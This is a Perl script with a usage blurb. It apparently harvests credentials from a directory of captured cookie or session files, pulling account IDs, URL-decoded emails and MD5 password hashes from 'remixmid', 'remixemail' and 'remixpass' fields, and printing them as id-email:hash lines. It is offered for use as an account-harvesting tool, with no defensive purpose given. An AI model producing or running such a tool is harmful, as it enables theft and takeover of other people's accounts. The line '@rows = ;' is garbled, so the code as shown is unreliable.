Extracts MD5 password hashes and credentials from files. Scans files in a directory, looks for remixmid (ID), remixemail (email), and remixpass (MD5 hash) patterns, URL-decodes email addresses, and outputs credentials in format: id-email:md5hash. Filters out deleted accounts.
perl md5-coco.pl <directory>Scans all files in directory for credential patterns and outputs extracted credentials.
#!/usr/bin/perl
#
opendir ROOT, $ARGV[0];
my(@filelist) = readdir ROOT;
foreach $filename (@filelist) {
if ($filename ne '.' and $filename ne '..') {
open(FILE, "$ARGV[0]\\$filename") or die "file $filename fail...";
$id = "";
$mail = "";
$pd5 = "";
$i = 0;
@rows = ;
chomp(@rows);
foreach $row (@rows) {
if ($row =~ /remixmid/) {
$id = $rows[$i+1];
}
if ($row =~ /remixemail/) {
$mail = $rows[$i+1];
$mail =~ s/%([0-9A-H]{2})/pack('C',hex($1))/egi;
}
if ($row =~ /remixpass/) {
$pd5 = $rows[$i+1];
}
$i++;
}
if ($mail && $pd5 && ($mail !~ "deleted")) {
print "$id-$mail:$pd5\n";
}
}
}